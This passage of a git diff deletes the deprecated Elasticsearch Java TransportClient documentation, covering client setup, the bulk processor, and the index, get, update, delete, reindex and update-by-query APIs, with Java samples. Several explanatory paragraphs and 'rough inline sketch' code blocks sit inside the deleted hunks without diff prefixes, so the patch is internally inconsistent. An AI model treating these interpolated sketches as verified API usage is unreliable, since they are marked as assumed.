.subAggregation(AggregationBuilders.dateHistogram("by_year") - .field("dateOfBirth") - .calendarInterval(DateHistogramInterval.YEAR) - .subAggregation(AggregationBuilders.avg("avg_children").field("children")) - ) - ) - .execute().actionGet(); --------------------------------------------------- - -=== Metrics aggregations - -include::aggregations/metrics.asciidoc[] - -=== Bucket aggregations - -include::aggregations/bucket.asciidoc[] diff --git a/docs/java-api/client.asciidoc b/docs/java-api/client.asciidoc deleted file mode 100644 index 811d7c398d9..00000000000 --- a/docs/java-api/client.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[[client]] -== Client - -You can use the *Java client* in multiple ways: - -* Perform standard <>, <>, - <> and <> operations on an - existing cluster -* Perform administrative tasks on a running cluster - -Obtaining an Elasticsearch `Client` is simple. 
The most common way to -get a client is by creating a <> -that connects to a cluster. - -[IMPORTANT] -============================== - -The client must have the same major version (e.g. `2.x`, or `5.x`) as the -nodes in the cluster. Clients may connect to clusters which have a different -minor version (e.g. `2.3.x`) but it is possible that new functionality may not -be supported. Ideally, the client should have the same version as the -cluster. - -============================== - -[[transport-client]] -=== Transport Client - -deprecated[7.0.0, The `TransportClient` is deprecated in favour of the {java-rest}/java-rest-high.html[Java High Level REST Client] and will be removed in Elasticsearch 8.0. The {java-rest}/java-rest-high-level-migration.html[migration guide] describes all the steps needed to migrate.] - -The `TransportClient` connects remotely to an Elasticsearch cluster -using the transport module. It does not join the cluster, but simply -gets one or more initial transport addresses and communicates with them -in round robin fashion on each action (though most actions will probably -be "two hop" operations). - -[source,java] --------------------------------------------------- -// on startup - -TransportClient client = new PreBuiltTransportClient(Settings.EMPTY) - .addTransportAddress(new TransportAddress(InetAddress.getByName("host1"), 9300)) - .addTransportAddress(new TransportAddress(InetAddress.getByName("host2"), 9300)); - -// on shutdown - -client.close(); --------------------------------------------------- - -Note that you have to set the cluster name if you use one different than -"elasticsearch": - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder() - .put("cluster.name", "myClusterName").build(); -TransportClient client = new PreBuiltTransportClient(settings); -//Add transport addresses and do something with the client... --------------------------------------------------- - -The Transport client comes with a cluster sniffing feature which -allows it to dynamically add new hosts and remove old ones. -When sniffing is enabled, the transport client will connect to the nodes in its -internal node list, which is built via calls to `addTransportAddress`. -After this, the client will call the internal cluster state API on those nodes -to discover available data nodes. The internal node list of the client will -be replaced with those data nodes only. This list is refreshed every five seconds by default. -Note that the IP addresses the sniffer connects to are the ones declared as the 'publish' -address in those node's Elasticsearch config. - -Keep in mind that the list might possibly not include the original node it connected to -if that node is not a data node. If, for instance, you initially connect to a -master node, after sniffing, no further requests will go to that master node, -but rather to any data nodes instead. The reason the transport client excludes non-data -nodes is to avoid sending search traffic to master only nodes. 
- -In order to enable sniffing, set `client.transport.sniff` to `true`: - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder() - .put("client.transport.sniff", true).build(); -TransportClient client = new PreBuiltTransportClient(settings); --------------------------------------------------- - -Other transport client level settings include: - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`client.transport.ignore_cluster_name` |Set to `true` to ignore cluster -name validation of connected nodes. (since 0.19.4) - -|`client.transport.ping_timeout` |The time to wait for a ping response -from a node. Defaults to `5s`. - -|`client.transport.nodes_sampler_interval` |How often to sample / ping -the nodes listed and connected. Defaults to `5s`. -|======================================================================= - - -[[client-connected-to-client-node]] -=== Connecting a Client to a Coordinating Only Node - -You can start locally a {ref}/modules-node.html#coordinating-only-node[Coordinating Only Node] -and then simply create a <> in your -application which connects to this Coordinating Only Node. - -This way, the coordinating only node will be able to load whatever plugin you -need (think about discovery plugins for example). diff --git a/docs/java-api/docs.asciidoc b/docs/java-api/docs.asciidoc deleted file mode 100644 index 181c5d8e0bd..00000000000 --- a/docs/java-api/docs.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[java-docs]] -== Document APIs - -This section describes the following CRUD APIs: - -.Single document APIs -* <> -* <> -* <> -* <> - -.Multi-document APIs -* <> -* <> -* <> -* <> -* <> - -NOTE: All CRUD APIs are single-index APIs. The `index` parameter accepts a single -index name, or an `alias` which points to a single index. - -include::docs/index_.asciidoc[] - -include::docs/get.asciidoc[] - -include::docs/delete.asciidoc[] - -include::docs/update.asciidoc[] - -include::docs/multi-get.asciidoc[] - -include::docs/bulk.asciidoc[] - -include::docs/update-by-query.asciidoc[] - -include::docs/reindex.asciidoc[] \ No newline at end of file diff --git a/docs/java-api/docs/bulk.asciidoc b/docs/java-api/docs/bulk.asciidoc deleted file mode 100644 index 9976ba52544..00000000000 --- a/docs/java-api/docs/bulk.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[java-docs-bulk]] -=== Bulk API - -The bulk API allows one to index and delete several documents in a -single request. 
Here is a sample usage: - -[source,java] --------------------------------------------------- -import static org.elasticsearch.common.xcontent.XContentFactory.*; - -BulkRequestBuilder bulkRequest = client.prepareBulk(); - -// either use client#prepare, or use Requests# to directly build index/delete requests -bulkRequest.add(client.prepareIndex("twitter", "_doc", "1") - .setSource(jsonBuilder() - .startObject() - .field("user", "kimchy") - .field("postDate", new Date()) - .field("message", "trying out Elasticsearch") - .endObject() - ) - ); - -bulkRequest.add(client.prepareIndex("twitter", "_doc", "2") - .setSource(jsonBuilder() - .startObject() - .field("user", "kimchy") - .field("postDate", new Date()) - .field("message", "another post") - .endObject() - ) - ); - -BulkResponse bulkResponse = bulkRequest.get(); -if (bulkResponse.hasFailures()) { - // process failures by iterating through each bulk response item -} --------------------------------------------------- - -[[java-docs-bulk-processor]] -=== Using Bulk Processor - -The `BulkProcessor` class offers a simple interface to flush bulk operations automatically based on the number or size -of requests, or after a given period. - -To use it, first create a `BulkProcessor` instance: - -[source,java] --------------------------------------------------- -import org.elasticsearch.action.bulk.BackoffPolicy; -import org.elasticsearch.action.bulk.BulkProcessor; -import org.elasticsearch.common.unit.ByteSizeUnit; -import org.elasticsearch.common.unit.ByteSizeValue; -import org.elasticsearch.common.unit.TimeValue; - -BulkProcessor bulkProcessor = BulkProcessor.builder( - client, <1> - new BulkProcessor.Listener() { - @Override - public void beforeBulk(long executionId, - BulkRequest request) { ... } <2> - - @Override - public void afterBulk(long executionId, - BulkRequest request, - BulkResponse response) { ... } <3> - - @Override - public void afterBulk(long executionId, - BulkRequest request, - Throwable failure) { ... } <4> - }) - .setBulkActions(10000) <5> - .setBulkSize(new ByteSizeValue(5, ByteSizeUnit.MB)) <6> - .setFlushInterval(TimeValue.timeValueSeconds(5)) <7> - .setConcurrentRequests(1) <8> - .setBackoffPolicy( - BackoffPolicy.exponentialBackoff(TimeValue.timeValueMillis(100), 3)) <9> - .build(); --------------------------------------------------- -<1> Add your Elasticsearch client -<2> This method is called just before bulk is executed. You can for example see the numberOfActions with - `request.numberOfActions()` -<3> This method is called after bulk execution. You can for example check if there was some failing requests - with `response.hasFailures()` -<4> This method is called when the bulk failed and raised a `Throwable` -<5> We want to execute the bulk every 10 000 requests -<6> We want to flush the bulk every 5mb -<7> We want to flush the bulk every 5 seconds whatever the number of requests -<8> Set the number of concurrent requests. A value of 0 means that only a single request will be allowed to be - executed. A value of 1 means 1 concurrent request is allowed to be executed while accumulating new bulk requests. -<9> Set a custom backoff policy which will initially wait for 100ms, increase exponentially and retries up to three - times. A retry is attempted whenever one or more bulk item requests have failed with an `EsRejectedExecutionException` - which indicates that there were too little compute resources available for processing the request. To disable backoff, - pass `BackoffPolicy.noBackoff()`. 
- -By default, `BulkProcessor`: - -* sets bulkActions to `1000` -* sets bulkSize to `5mb` -* does not set flushInterval -* sets concurrentRequests to 1, which means an asynchronous execution of the flush operation. -* sets backoffPolicy to an exponential backoff with 8 retries and a start delay of 50ms. The total wait time is roughly 5.1 seconds. - -[[java-docs-bulk-processor-requests]] -==== Add requests - -Then you can simply add your requests to the `BulkProcessor`: - -[source,java] --------------------------------------------------- -bulkProcessor.add(new IndexRequest("twitter", "_doc", "1").source(/* your doc here */)); -bulkProcessor.add(new DeleteRequest("twitter", "_doc", "2")); --------------------------------------------------- - -[[java-docs-bulk-processor-close]] -==== Closing the Bulk Processor - -When all documents are loaded to the `BulkProcessor` it can be closed by using `awaitClose` or `close` methods: - -[source,java] --------------------------------------------------- -bulkProcessor.awaitClose(10, TimeUnit.MINUTES); --------------------------------------------------- - -or - -[source,java] --------------------------------------------------- -bulkProcessor.close(); --------------------------------------------------- - -Both methods flush any remaining documents and disable all other scheduled flushes, if they were scheduled by setting -`flushInterval`. If concurrent requests were enabled, the `awaitClose` method waits for up to the specified timeout for -all bulk requests to complete then returns `true`; if the specified waiting time elapses before all bulk requests complete, -`false` is returned. The `close` method doesn't wait for any remaining bulk requests to complete and exits immediately. - -[[java-docs-bulk-processor-tests]] -==== Using Bulk Processor in tests - -If you are running tests with Elasticsearch and are using the `BulkProcessor` to populate your dataset -you should better set the number of concurrent requests to `0` so the flush operation of the bulk will be executed -in a synchronous manner: - -[source,java] --------------------------------------------------- -BulkProcessor bulkProcessor = BulkProcessor.builder(client, new BulkProcessor.Listener() { /* Listener methods */ }) - .setBulkActions(10000) - .setConcurrentRequests(0) - .build(); - -// Add your requests -bulkProcessor.add(/* Your requests */); - -// Flush any remaining requests -bulkProcessor.flush(); - -// Or close the bulkProcessor if you don't need it anymore -bulkProcessor.close(); - -// Refresh your indices -client.admin().indices().prepareRefresh().get(); - -// Now you can start searching! -client.prepareSearch().get(); --------------------------------------------------- - - -[[java-docs-bulk-global-parameters]] -==== Global Parameters - -Global parameters can be specified on the BulkRequest as well as BulkProcessor, similar to the REST API. These global - parameters serve as defaults and can be overridden by local parameters specified on each sub request. Some parameters - have to be set before any sub request is added - index, type - and you have to specify them during BulkRequest or - BulkProcessor creation. Some are optional - pipeline, routing - and can be specified at any point before the bulk is sent. 
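The tested snippets for global and local parameters are pulled in below. As a rough inline sketch only (it assumes the `BulkRequest(String globalIndex)` constructor and the `pipeline(...)`/`routing(...)` global setters, plus `setPipeline(...)` on the sub request), mixing global and local parameters looks roughly like this:

[source,java]
--------------------------------------------------
import org.elasticsearch.action.bulk.BulkRequest;
import org.elasticsearch.action.bulk.BulkResponse;
import org.elasticsearch.action.index.IndexRequest;
import org.elasticsearch.common.xcontent.XContentType;

// Sketch only (assumed API): global index, routing and pipeline set once on the BulkRequest
BulkRequest bulkRequest = new BulkRequest("twitter")      // global index
        .pipeline("my-default-pipeline")                  // global default pipeline
        .routing("user-1");                               // global default routing

// This sub request inherits all of the globals above
bulkRequest.add(new IndexRequest()
        .id("1")
        .source("{\"user\":\"kimchy\"}", XContentType.JSON));

// This sub request overrides the global pipeline with its own local value
bulkRequest.add(new IndexRequest()
        .id("2")
        .setPipeline("my-other-pipeline")
        .source("{\"user\":\"dadoonet\"}", XContentType.JSON));

BulkResponse bulkResponse = client.bulk(bulkRequest).actionGet();
--------------------------------------------------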
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{hlrc-tests}/BulkProcessorIT.java[bulk-processor-mix-parameters] --------------------------------------------------- -<1> global parameters from the BulkRequest will be applied on a sub request -<2> local pipeline parameter on a sub request will override global parameters from BulkRequest - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{hlrc-tests}/BulkRequestWithGlobalParametersIT.java[bulk-request-mix-pipeline] --------------------------------------------------- -<1> local pipeline parameter on a sub request will override global pipeline from the BulkRequest -<2> global parameter from the BulkRequest will be applied on a sub request diff --git a/docs/java-api/docs/delete.asciidoc b/docs/java-api/docs/delete.asciidoc deleted file mode 100644 index 004edc84b3d..00000000000 --- a/docs/java-api/docs/delete.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[java-docs-delete]] -=== Delete API - -The delete API allows one to delete a typed JSON document from a specific -index based on its id. The following example deletes the JSON document -from an index called twitter, under a type called `_doc`, with id valued -1: - -[source,java] --------------------------------------------------- -DeleteResponse response = client.prepareDelete("twitter", "_doc", "1").get(); --------------------------------------------------- - -For more information on the delete operation, check out the -{ref}/docs-delete.html[delete API] docs. - -[[java-docs-delete-by-query]] -=== Delete By Query API - -The delete by query API allows one to delete a given set of documents based on -the result of a query: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[delete-by-query-sync] --------------------------------------------------- -<1> query -<2> index -<3> execute the operation -<4> number of deleted documents - -As it can be a long running operation, if you wish to do it asynchronously, you can call `execute` instead of `get` -and provide a listener like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[delete-by-query-async] --------------------------------------------------- -<1> query -<2> index -<3> listener -<4> number of deleted documents diff --git a/docs/java-api/docs/get.asciidoc b/docs/java-api/docs/get.asciidoc deleted file mode 100644 index 03c642cbac8..00000000000 --- a/docs/java-api/docs/get.asciidoc +++ /dev/null @@ -1,14 +0,0 @@ -[[java-docs-get]] -=== Get API - -The get API allows to get a typed JSON document from the index based on -its id. The following example gets a JSON document from an index called -twitter, under a type called `_doc`, with id valued 1: - -[source,java] --------------------------------------------------- -GetResponse response = client.prepareGet("twitter", "_doc", "1").get(); --------------------------------------------------- - -For more information on the get operation, check out the REST -{ref}/docs-get.html[get] docs. 
diff --git a/docs/java-api/docs/index_.asciidoc b/docs/java-api/docs/index_.asciidoc
deleted file mode 100644
index 694a29beba0..00000000000
--- a/docs/java-api/docs/index_.asciidoc
+++ /dev/null
@@ -1,167 +0,0 @@
-[[java-docs-index]]
-=== Index API
-
-The index API allows one to index a typed JSON document into a specific
-index and make it searchable.
-
-
-[[java-docs-index-generate]]
-==== Generate JSON document
-
-There are several different ways of generating a JSON document:
-
-* Manually (aka do it yourself) using native `byte[]` or as a `String`
-
-* Using a `Map` that will be automatically converted to its JSON
-equivalent
-
-* Using a third party library to serialize your beans such as
-https://github.com/FasterXML/jackson[Jackson]
-
-* Using the built-in helper `XContentFactory.jsonBuilder()`
-
-Internally, each type is converted to `byte[]` (so a String is converted
-to a `byte[]`). Therefore, if the object is in this form already, then
-use it. The `jsonBuilder` is a highly optimized JSON generator that
-directly constructs a `byte[]`.
-
-
-[[java-docs-index-generate-diy]]
-===== Do It Yourself
-
-Nothing difficult here, but note that you will have to encode
-dates according to the
-{ref}/mapping-date-format.html[Date Format].
-
-[source,java]
---------------------------------------------------
-String json = "{" +
-    "\"user\":\"kimchy\"," +
-    "\"postDate\":\"2013-01-30\"," +
-    "\"message\":\"trying out Elasticsearch\"" +
-"}";
---------------------------------------------------
-
-
-[[java-docs-index-generate-using-map]]
-===== Using Map
-
-A `Map` is a key/value pair collection. It maps naturally to a JSON structure:
-
-[source,java]
---------------------------------------------------
-Map<String, Object> json = new HashMap<>();
-json.put("user","kimchy");
-json.put("postDate",new Date());
-json.put("message","trying out Elasticsearch");
---------------------------------------------------
-
-
-[[java-docs-index-generate-beans]]
-===== Serialize your beans
-
-You can use https://github.com/FasterXML/jackson[Jackson] to serialize
-your beans to JSON. Please add http://search.maven.org/#search%7Cga%7C1%7Cjackson-databind[Jackson Databind]
- to your project. Then you can use `ObjectMapper` to serialize your beans:
-
-[source,java]
---------------------------------------------------
-import com.fasterxml.jackson.databind.*;
-
-// instantiate a JSON mapper
-ObjectMapper mapper = new ObjectMapper(); // create once, reuse
-
-// generate JSON as a byte array
-byte[] json = mapper.writeValueAsBytes(yourbeaninstance);
---------------------------------------------------
-
-
-[[java-docs-index-generate-helpers]]
-===== Use Elasticsearch helpers
-
-Elasticsearch provides built-in helpers to generate JSON content.
-
-[source,java]
---------------------------------------------------
-import static org.elasticsearch.common.xcontent.XContentFactory.*;
-
-XContentBuilder builder = jsonBuilder()
-    .startObject()
-        .field("user", "kimchy")
-        .field("postDate", new Date())
-        .field("message", "trying out Elasticsearch")
-    .endObject();
---------------------------------------------------
-
-Note that you can also add arrays with the `startArray(String)` and
-`endArray()` methods. The `field` method accepts many object types:
-you can directly pass numbers, dates, and even other `XContentBuilder` objects.
-
-If you need to see the generated JSON content, you can use the
-`Strings.toString()` method.
-
-[source,java]
---------------------------------------------------
-import org.elasticsearch.common.Strings;
-
-String json = Strings.toString(builder);
---------------------------------------------------
-
-
-[[java-docs-index-doc]]
-==== Index document
-
-The following example indexes a JSON document into an index called
-twitter, under a type called `_doc`, with id 1:
-
-[source,java]
---------------------------------------------------
-import static org.elasticsearch.common.xcontent.XContentFactory.*;
-
-IndexResponse response = client.prepareIndex("twitter", "_doc", "1")
-        .setSource(jsonBuilder()
-                    .startObject()
-                        .field("user", "kimchy")
-                        .field("postDate", new Date())
-                        .field("message", "trying out Elasticsearch")
-                    .endObject()
-                  )
-        .get();
---------------------------------------------------
-
-Note that you can also index your documents as a JSON string and that you
-don't have to provide an ID:
-
-[source,java]
---------------------------------------------------
-String json = "{" +
-        "\"user\":\"kimchy\"," +
-        "\"postDate\":\"2013-01-30\"," +
-        "\"message\":\"trying out Elasticsearch\"" +
-    "}";
-
-IndexResponse response = client.prepareIndex("twitter", "_doc")
-        .setSource(json, XContentType.JSON)
-        .get();
---------------------------------------------------
-
-The `IndexResponse` object will give you a report:
-
-[source,java]
---------------------------------------------------
-// Index name
-String _index = response.getIndex();
-// Type name
-String _type = response.getType();
-// Document ID (generated or not)
-String _id = response.getId();
-// Version (if it's the first time you index this document, you will get: 1)
-long _version = response.getVersion();
-// Status of the operation (CREATED for a new document, OK for an update)
-RestStatus status = response.status();
---------------------------------------------------
-
-For more information on the index operation, check out the REST
-{ref}/docs-index_.html[index] docs.
-
diff --git a/docs/java-api/docs/multi-get.asciidoc b/docs/java-api/docs/multi-get.asciidoc
deleted file mode 100644
index 8ed2bede292..00000000000
--- a/docs/java-api/docs/multi-get.asciidoc
+++ /dev/null
@@ -1,30 +0,0 @@
-[[java-docs-multi-get]]
-=== Multi Get API
-
-The multi get API allows you to get a list of documents based on their `index` and `id`:
-
-[source,java]
---------------------------------------------------
-MultiGetResponse multiGetItemResponses = client.prepareMultiGet()
-    .add("twitter", "_doc", "1") <1>
-    .add("twitter", "_doc", "2", "3", "4") <2>
-    .add("another", "_doc", "foo") <3>
-    .get();
-
-for (MultiGetItemResponse itemResponse : multiGetItemResponses) { <4>
-    GetResponse response = itemResponse.getResponse();
-    if (response.isExists()) { <5>
-        String json = response.getSourceAsString(); <6>
-    }
-}
---------------------------------------------------
-<1> get by a single id
-<2> or by a list of ids for the same index
-<3> you can also get from another index
-<4> iterate over the result set
-<5> you can check if the document exists
-<6> access to the `_source` field
-
-For more information on the multi get operation, check out the REST
-{ref}/docs-multi-get.html[multi get] docs.
-
diff --git a/docs/java-api/docs/reindex.asciidoc b/docs/java-api/docs/reindex.asciidoc
deleted file mode 100644
index 842e763f74d..00000000000
--- a/docs/java-api/docs/reindex.asciidoc
+++ /dev/null
@@ -1,11 +0,0 @@
-[[java-docs-reindex]]
-=== Reindex API
-
-See {ref}/docs-reindex.html[reindex API].
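The tested snippet from the client tests is included below. As a rough inline sketch only (assuming the `ReindexRequestBuilder` from the `reindex` module, with `source(...)`, `destination(...)` and an optional `filter(...)` query), a reindex call looks roughly like this:

[source,java]
--------------------------------------------------
import org.elasticsearch.index.query.QueryBuilders;
import org.elasticsearch.index.reindex.BulkByScrollResponse;
import org.elasticsearch.index.reindex.ReindexAction;
import org.elasticsearch.index.reindex.ReindexRequestBuilder;

// Sketch only (assumed API): copy documents from source_index into target_index,
// optionally limiting which documents are re-indexed with a query.
BulkByScrollResponse response =
    new ReindexRequestBuilder(client, ReindexAction.INSTANCE)
        .source("source_index")
        .destination("target_index")
        .filter(QueryBuilders.termQuery("user", "kimchy")) // optional filter query
        .get();
--------------------------------------------------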
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[reindex1] --------------------------------------------------- -<1> Optionally a query can provided to filter what documents should be - re-indexed from the source to the target index. diff --git a/docs/java-api/docs/update-by-query.asciidoc b/docs/java-api/docs/update-by-query.asciidoc deleted file mode 100644 index 5a272b8c23c..00000000000 --- a/docs/java-api/docs/update-by-query.asciidoc +++ /dev/null @@ -1,166 +0,0 @@ -[[java-docs-update-by-query]] -=== Update By Query API - -The simplest usage of `updateByQuery` updates each -document in an index without changing the source. This usage enables -picking up a new property or another online mapping change. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query] --------------------------------------------------- - -Calls to the `updateByQuery` API start by getting a snapshot of the index, indexing -any documents found using the `internal` versioning. - -NOTE: Version conflicts happen when a document changes between the time of the -snapshot and the time the index request processes. - -When the versions match, `updateByQuery` updates the document -and increments the version number. - -All update and query failures cause `updateByQuery` to abort. These failures are -available from the `BulkByScrollResponse#getIndexingFailures` method. Any -successful updates remain and are not rolled back. While the first failure -causes the abort, the response contains all of the failures generated by the -failed bulk request. - -To prevent version conflicts from causing `updateByQuery` to abort, set -`abortOnVersionConflict(false)`. The first example does this because it is -trying to pick up an online mapping change and a version conflict means that -the conflicting document was updated between the start of the `updateByQuery` -and the time when it attempted to update the document. This is fine because -that update will have picked up the online mapping update. - -The `UpdateByQueryRequestBuilder` API supports filtering the updated documents, -limiting the total number of documents to update, and updating documents -with a script: - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-filter] --------------------------------------------------- - -`UpdateByQueryRequestBuilder` also enables direct access to the query used -to select the documents. You can use this access to change the default scroll size or -otherwise modify the request for matching documents. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-size] --------------------------------------------------- - -You can also combine `maxDocs` with sorting to limit the documents updated: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-sort] --------------------------------------------------- - -In addition to changing the `_source` field for the document, you can use a -script to change the action, similar to the Update API: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-script] --------------------------------------------------- - -As in the <>, you can set the value of `ctx.op` to change the -operation that executes: - -`noop`:: - -Set `ctx.op = "noop"` if your script doesn't make any -changes. The `updateByQuery` operation then omits that document from the updates. -This behavior increments the `noop` counter in the response body. - -`delete`:: - -Set `ctx.op = "delete"` if your script decides that the document must be -deleted. The deletion will be reported in the `deleted` counter in the -response body. - -Setting `ctx.op` to any other value generates an error. Setting any -other field in `ctx` generates an error. - -This API doesn't allow you to move the documents it touches, just modify their -source. This is intentional! We've made no provisions for removing the document -from its original location. - -You can also perform these operations on multiple indices at once, similar to the search API: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-multi-index] --------------------------------------------------- - -If you provide a `routing` value then the process copies the routing value to the scroll query, -limiting the process to the shards that match that routing value: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-routing] --------------------------------------------------- - -`updateByQuery` can also use the ingest node by -specifying a `pipeline` like this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-pipeline] --------------------------------------------------- - -[discrete] -[[java-docs-update-by-query-task-api]] -=== Works with the Task API - -You can fetch the status of all running update-by-query requests with the Task API: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-list-tasks] --------------------------------------------------- - -With the `TaskId` shown above you can look up the task directly: - -// provide API Example -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 
-include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-get-task] --------------------------------------------------- - -[discrete] -[[java-docs-update-by-query-cancel-task-api]] -=== Works with the Cancel Task API - -Any Update By Query can be canceled using the Task Cancel API: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-cancel-task] --------------------------------------------------- - -Use the `list tasks` API to find the value of `taskId`. - -Cancelling a request is typically a very fast process but can take up to a few seconds. -The task status API continues to list the task until the cancellation is complete. - -[discrete] -[[java-docs-update-by-query-rethrottle]] -=== Rethrottling - -Use the `_rethrottle` API to change the value of `requests_per_second` on a running update: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-rethrottle] --------------------------------------------------- - -Use the `list tasks` API to find the value of `taskId`. - -As with the `updateByQuery` API, the value of `requests_per_second` -can be any positive float value to set the level of the throttle, or `Float.POSITIVE_INFINITY` to disable throttling. -A value of `requests_per_second` that speeds up the process takes -effect immediately. `requests_per_second` values that slow the query take effect -after completing the current batch in order to prevent scroll timeouts. diff --git a/docs/java-api/docs/update.asciidoc b/docs/java-api/docs/update.asciidoc deleted file mode 100644 index 1c8757c4ba7..00000000000 --- a/docs/java-api/docs/update.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[[java-docs-update]] -=== Update API - - -You can either create an `UpdateRequest` and send it to the client: - -[source,java] --------------------------------------------------- -UpdateRequest updateRequest = new UpdateRequest(); -updateRequest.index("index"); -updateRequest.type("_doc"); -updateRequest.id("1"); -updateRequest.doc(jsonBuilder() - .startObject() - .field("gender", "male") - .endObject()); -client.update(updateRequest).get(); --------------------------------------------------- - -Or you can use `prepareUpdate()` method: - -[source,java] --------------------------------------------------- -client.prepareUpdate("ttl", "doc", "1") - .setScript(new Script( - "ctx._source.gender = \"male\"", <1> - ScriptType.INLINE, null, null)) - .get(); - -client.prepareUpdate("ttl", "doc", "1") - .setDoc(jsonBuilder() <2> - .startObject() - .field("gender", "male") - .endObject()) - .get(); --------------------------------------------------- -<1> Your script. It could also be a locally stored script name. -In that case, you'll need to use `ScriptType.FILE`. -<2> Document which will be merged to the existing one. - -Note that you can't provide both `script` and `doc`. 
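Both forms return an `UpdateResponse` that you can inspect to see what actually happened. As a rough, hypothetical sketch (assuming `client` is an existing `Client` instance and that the index, type, and id values are placeholders), checking the result of a partial-document update might look like this:

[source,java]
--------------------------------------------------
import org.elasticsearch.action.DocWriteResponse;
import org.elasticsearch.action.update.UpdateRequest;
import org.elasticsearch.action.update.UpdateResponse;

import static org.elasticsearch.common.xcontent.XContentFactory.jsonBuilder;

// Partial-document update; "index", "_doc" and "1" are placeholder values
UpdateRequest updateRequest = new UpdateRequest("index", "_doc", "1")
        .doc(jsonBuilder()
                .startObject()
                    .field("gender", "male")
                .endObject());

UpdateResponse updateResponse = client.update(updateRequest).get();

// The result reports whether the document was created, updated, deleted or left as-is
if (updateResponse.getResult() == DocWriteResponse.Result.NOOP) {
    // the stored document already contained exactly these values
}
--------------------------------------------------

A `NOOP` result simply means the merged document was identical to the stored one, so nothing was written.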
- -[[java-docs-update-api-script]] -==== Update by script - -The update API allows to update a document based on a script provided: - -[source,java] --------------------------------------------------- -UpdateRequest updateRequest = new UpdateRequest("ttl", "doc", "1") - .script(new Script("ctx._source.gender = \"male\"")); -client.update(updateRequest).get(); --------------------------------------------------- - - -[[java-docs-update-api-merge-docs]] -==== Update by merging documents - -The update API also support passing a partial document, which will be merged into the existing document (simple -recursive merge, inner merging of objects, replacing core "keys/values" and arrays). For example: - -[source,java] --------------------------------------------------- -UpdateRequest updateRequest = new UpdateRequest("index", "type", "1") - .doc(jsonBuilder() - .startObject() - .field("gender", "male") - .endObject()); -client.update(updateRequest).get(); --------------------------------------------------- - - -[[java-docs-update-api-upsert]] -==== Upsert - -There is also support for `upsert`. If the document does not exist, the content of the `upsert` -element will be used to index the fresh doc: - -[source,java] --------------------------------------------------- -IndexRequest indexRequest = new IndexRequest("index", "type", "1") - .source(jsonBuilder() - .startObject() - .field("name", "Joe Smith") - .field("gender", "male") - .endObject()); -UpdateRequest updateRequest = new UpdateRequest("index", "type", "1") - .doc(jsonBuilder() - .startObject() - .field("name", "Joe Dalton") - .endObject()) - .upsert(indexRequest); <1> -client.update(updateRequest).get(); --------------------------------------------------- -<1> If the document does not exist, the one in `indexRequest` will be added - -If the document `index/_doc/1` already exists, we will have after this operation a document like: - -[source,js] --------------------------------------------------- -{ - "name" : "Joe Dalton", <1> - "gender": "male" -} --------------------------------------------------- -// NOTCONSOLE -<1> This field is updated by the update request - -If it does not exist, we will have a new document: - -[source,js] --------------------------------------------------- -{ - "name" : "Joe Smith", - "gender": "male" -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/java-api/index.asciidoc b/docs/java-api/index.asciidoc deleted file mode 100644 index 9c3b4b68357..00000000000 --- a/docs/java-api/index.asciidoc +++ /dev/null @@ -1,149 +0,0 @@ -= Java API (deprecated) - -include::{elasticsearch-root}/docs/Versions.asciidoc[] - -[[java-api]] -[preface] -== Preface - -deprecated[7.0.0, The `TransportClient` is deprecated in favour of the {java-rest}/java-rest-high.html[Java High Level REST Client] and will be removed in Elasticsearch 8.0. The {java-rest}/java-rest-high-level-migration.html[migration guide] describes all the steps needed to migrate.] - -This section describes the Java API that Elasticsearch provides. All -Elasticsearch operations are executed using a -<> object. All -operations are completely asynchronous in nature (either accepts a -listener, or returns a future). - -Additionally, operations on a client may be accumulated and executed in -<>. - -Note, all the APIs are exposed through the -Java API (actually, the Java API is used internally to execute them). - -== Javadoc - -The javadoc for the transport client can be found at {transport-client-javadoc}/index.html. 
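To make the execution model mentioned in the preface more concrete, here is a minimal, illustrative sketch of the blocking and listener-based styles (assuming `client` is an existing transport `Client` and `"index"` is a placeholder index name):

[source,java]
--------------------------------------------------
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.action.search.SearchResponse;

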